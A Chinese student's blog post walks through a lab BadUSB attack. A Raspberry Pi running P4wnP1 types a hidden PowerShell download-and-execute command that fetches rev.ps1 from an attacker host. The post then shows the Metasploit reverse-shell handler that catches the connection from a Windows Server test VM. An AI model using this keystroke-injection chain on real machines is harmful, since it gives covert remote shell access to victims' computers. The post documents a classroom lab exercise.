<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>欢迎来到这里喵~~σ(´∀｀*)</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - $1 行","copy":"复制"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: '确认'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>badusb实验：一次将p4wnp1_aloa和metasploit结合利用的尝试</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2026-08-05T16:00:00.000Z" id="date"> 2026-08-06</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2026-08-06T10:01:52.200Z" id="updated"> 2026-08-06</time></div></span></div></div><hr><div id="post-content"><h1 id="badusb实验：一次将p4wnp1-aloa和metasploit结合利用的尝试"><a href="#badusb实验：一次将p4wnp1-aloa和metasploit结合利用的尝试" class="headerlink" title="badusb实验：一次将p4wnp1_aloa和metasploit结合利用的尝试"></a>badusb实验：一次将p4wnp1_aloa和metasploit结合利用的尝试</h1><p>起因是在放假之前，专业课老师留了一个期末作业，要求利用社会工程学复现攻击。在做作业的时候突发奇想，我的手边刚好有一个树莓派zerow，结合p4wnp1_aloa的项目可以进行一次badusb的实验。</p>
<p>先搞一个usb连接板把它和树莓派zerow装在一起，长这样（手机像素拍摄出来的效果不好）</p>
<p class='item-img' data-src='/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_1.jpeg'><img src="/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_1.jpeg" alt="image"><br class='item-img' data-src='/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_2.jpeg'><img src="/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_2.jpeg" alt="image"></p>
<p>另外还需要一个SD卡和一个读卡器，用来烧录系统，这里用的是一张16gb的SD卡。把SD卡插入读卡器连接电脑，首先要对SD卡进行格式化，这里使用SD Card Formatter来进行格式化</p>
<p class='item-img' data-src='/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_3.png'><img src="/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_3.png" alt="image"></p>
<p>从github仓库里下载p4wnp1_aloa的镜像，大概1.1GB，直接访问下载可能很慢，可以尝试用minecraft的pcl启动器下载，速度会有提升</p>
<p>下载完成后使用树莓派的烧录软件Raspberry Pi Imager来烧录系统。进入之后选择Raspberry Pi Zero，系统选择使用自定义镜像选择好镜像和设备，等待烧录完成即可</p>
<p class='item-img' data-src='/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_4.png'><img src="/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_4.png" alt="image"></p>
<p>注意插入电脑烧录系统时一定要插到电脑读写速度快的那个usb插口（一开始我用的是慢的口烧录了3次全部失败，换速度快的另一个usb口一次成功(╥﹏╥)）</p>
<p>将烧录好系统的卡插到树莓派上再插入电脑，等待树莓派开机，系统准备好后可以找到一个p4wnp1的wifi</p>
<p class='item-img' data-src='/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_5.png'><img src="/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_5.png" alt="image"></p>
<p>连接wifi后访问172.24.0.1:8000就可以进入p4wnp1的配置界面</p>
<p class='item-img' data-src='/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_6.png'><img src="/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_6.png" alt="image"></p>
<p>进入WIFI SETTINGS先来配置网络连接模式，选择<strong>Client with Failover to AP</strong>，这个模式能让树莓派先连接已有的wifi，如果失败再开启自己的wifi。填入wifi的SSID和密码，这里用的是我手机的热点，保存成startup后重启一下就可以让树莓派连接到手机热点来访问网络了</p>
<p class='item-img' data-src='/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_7.png'><img src="/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_7.png" alt="image"></p>
<p>树莓派接入网络后的ip变成了172.16.0.1，用ssh来连接测试一下，密码默认toor</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&gt; ssh root@172.16.0.1</span><br><span class="line">The authenticity of host &#x27;172.16.0.1 (172.16.0.1)&#x27; can&#x27;t be established.</span><br><span class="line">ED25519 key fingerprint is SHA256:IDIeCSXhsACXVfhHQKKFaqsQQq5MsEdINh0hbRPYm9Q.</span><br><span class="line">This key is not known by any other names.</span><br><span class="line">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes</span><br><span class="line">Warning: Permanently added &#x27;172.16.0.1&#x27; (ED25519) to the list of known hosts.</span><br><span class="line">root@172.16.0.1&#x27;s password:</span><br><span class="line">Linux kali 4.14.80-Re4son+ #1 Thu Feb 6 15:03:43 CET 2020 armv6l</span><br><span class="line"></span><br><span class="line">The programs included with the Kali GNU/Linux system are free software;</span><br><span class="line">the exact distribution terms for each program are described in the</span><br><span class="line">individual files in /usr/share/doc/*/copyright.</span><br><span class="line"></span><br><span class="line">Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent</span><br><span class="line">permitted by applicable law.</span><br><span class="line">root@kali:~#</span><br></pre></td></tr></table></figure>

<p>这样整个p4wnp1就可以直接使用了。对于具体的攻击，github上有开源的项目P4wnP1-A.L.O.A.-Payloads，但是我在我自己的环境测试的时候总是失败，我找了各种各样的payload脚本，总是会在模拟键鼠输入时出各种问题，所以我才想到结合metasploit来进行攻击测试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">P4wnP1 A.L.O.A Payloads链接:https://github.com/NightRang3r/P4wnP1-A.L.O.A.-Payloads</span><br></pre></td></tr></table></figure>

<p>结合现代的vibe coding技术，整出来了一个适用我的实验环境的使用metasploit来连接shell的方案，大概就是在攻击机上开个端口放木马，然后让badusb模拟键鼠下载木马执行，利用木马来反弹shell。在HID脚本（staged_shell.js）中是利用的80端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">// ===== CONFIG =====</span><br><span class="line">var LISTENER_IP = &quot;192.168.xxx.xxx&quot;;  // Kali 攻击机 IP</span><br><span class="line">var HTTP_PORT = &quot;80&quot;;                  // HTTP 服务器端口</span><br><span class="line">// ==================</span><br><span class="line"></span><br><span class="line">layout(&quot;US&quot;);</span><br><span class="line">typingSpeed(0,0);</span><br><span class="line"></span><br><span class="line">// 打开运行窗口</span><br><span class="line">press(&quot;GUI r&quot;);</span><br><span class="line">delay(500);</span><br><span class="line"></span><br><span class="line">// PowerShell 下载并执行</span><br><span class="line">type(&quot;powershell -nop -w hidden -ep bypass -c \&quot;IEX(New-Object Net.WebClient).DownloadString(&#x27;http://&quot; + LISTENER_IP + &quot;:&quot; + HTTP_PORT + &quot;/rev.ps1&#x27;)\&quot;&quot;);</span><br><span class="line">delay(300);</span><br><span class="line"></span><br><span class="line">press(&quot;ENTER&quot;);</span><br></pre></td></tr></table></figure>

<p>完整的脚本和需要的文件我都放在一个github仓库里了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shellofP4wnP1 learn链接：https://github.com/renge1145141919810/shellofP4wnP1-learn-</span><br></pre></td></tr></table></figure>

<p>回到p4wnp1，我们先来确定一下p4wnp1能够连接外网，尝试ping百度</p>
<p class='item-img' data-src='/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_8.png'><img src="/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_8.png" alt="image"></p>
<p>能ping通，说明可以连接外网了。那我们可以把之前搞的仓库克隆下来进行部署，对于树莓派的部署也比较简单，核心就是一个rev.ps1文件和HID脚本。在HID脚本<strong>staged_shell.js</strong>中写好攻击机的ip后放到 <strong>&#x2F;usr&#x2F;local&#x2F;P4wnP1&#x2F;HIDScripts</strong>目录下就行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~/tempofshell/hid_scripts# cd /usr/local/P4wnP1/HIDScripts</span><br><span class="line">root@kali:/usr/local/P4wnP1/HIDScripts# cp ~/tempofshell/hid_scripts/staged_shell.js ./</span><br><span class="line">root@kali:/usr/local/P4wnP1/HIDScripts# ls</span><br><span class="line">cosmouse.js  helper.js  hidtest1.js  mousejiggle.js  ms_snake.js  sinmouse.js  staged_shell.js  wifi_covert_channel.js</span><br></pre></td></tr></table></figure>

<p>浏览器访问172.16.0.1:8000进行配置，进入trigger actions，选择add one，Trigger选择USB gadget connected to host，Action选择start a HIDScript，Script name选择staged_shell.js</p>
<p class='item-img' data-src='/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_9.png'><img src="/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_9.png" alt="image"></p>
<p>保存成startup之后就行</p>
<p>准备工作已经做完，接下来要进行完整的攻击流程。这里我的靶机是一台windows sever2019虚拟机，攻击机则是一台kali linux虚拟机。实现攻击最重要的就是那个rev.ps1文件，我们需要先把它放到我们kali用于启动网站服务的目录下面，也就是 <strong>&#x2F;var&#x2F;www&#x2F;html</strong>。完成后启动http服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cp rev.ps1 /var/www/html</span><br><span class="line">cd /var/www/html &amp;&amp; python3 -m http.server 80</span><br></pre></td></tr></table></figure>

<p>然后我们新开一个终端窗口开启msf，选择使用exploit&#x2F;multi&#x2F;handler</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br></pre></td></tr></table></figure>

<p>payload我们选择windows&#x2F;x64&#x2F;shell_reverse_tcp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set payload windows/x64/shell_reverse_tcp</span><br></pre></td></tr></table></figure>

<p>设置好LHOST和LPORT后开启监听</p>
<p class='item-img' data-src='/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_10.png'><img src="/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_10.png" alt="image"></p>
<p>来到windows sever，插入做好的badusb，由于是树莓派做的，每次插入都需要重新启动一遍系统，所以需要等大概40秒钟左右。系统启动后会执行脚本，能看到命令框闪了一下，回到kali就可以看见拿到的会话shell了</p>
<p class='item-img' data-src='/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_11.png'><img src="/images/badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1_aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95/img_11.png" alt="image"></p>
<h3 id="可能需要的资源链接"><a href="#可能需要的资源链接" class="headerlink" title="可能需要的资源链接"></a>可能需要的资源链接</h3><p><strong>P4wnP1_aloa链接：<a target="_blank" rel="noopener" href="https://github.com/RoganDawes/P4wnP1_aloa/releases/tag/v0.1.1-beta">https://github.com/RoganDawes/P4wnP1_aloa/releases/tag/v0.1.1-beta</a></strong><br><strong>P4wnP1-A.L.O.A payloads链接：<a target="_blank" rel="noopener" href="https://github.com/NightRang3r/P4wnP1-A.L.O.A.-Payloads">https://github.com/NightRang3r/P4wnP1-A.L.O.A.-Payloads</a></strong><br><strong>shellofp4wnp1-learn-链接：<a target="_blank" rel="noopener" href="https://github.com/renge1145141919810/shellofP4wnP1-learn-">https://github.com/renge1145141919810/shellofP4wnP1-learn-</a></strong></p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-end"><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2026/07/31/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9A%5BLitCTF2026%5D%20lit_ropchain/">pwn做题记录：[LitCTF2026] lit_ropchain 上一篇 →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="文章目录">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">GalaNarr</a></h1><div id="description"><p>一个专注于彻底摆烂的新手博客喵~~</p></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#badusb%E5%AE%9E%E9%AA%8C%EF%BC%9A%E4%B8%80%E6%AC%A1%E5%B0%86p4wnp1-aloa%E5%92%8Cmetasploit%E7%BB%93%E5%90%88%E5%88%A9%E7%94%A8%E7%9A%84%E5%B0%9D%E8%AF%95"><span class="toc-number">1.</span> <span class="toc-text">badusb实验：一次将p4wnp1_aloa和metasploit结合利用的尝试</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%AF%E8%83%BD%E9%9C%80%E8%A6%81%E7%9A%84%E8%B5%84%E6%BA%90%E9%93%BE%E6%8E%A5"><span class="toc-number">1.0.1.</span> <span class="toc-text">可能需要的资源链接</span></a></li></ol></li></ol></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> 主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>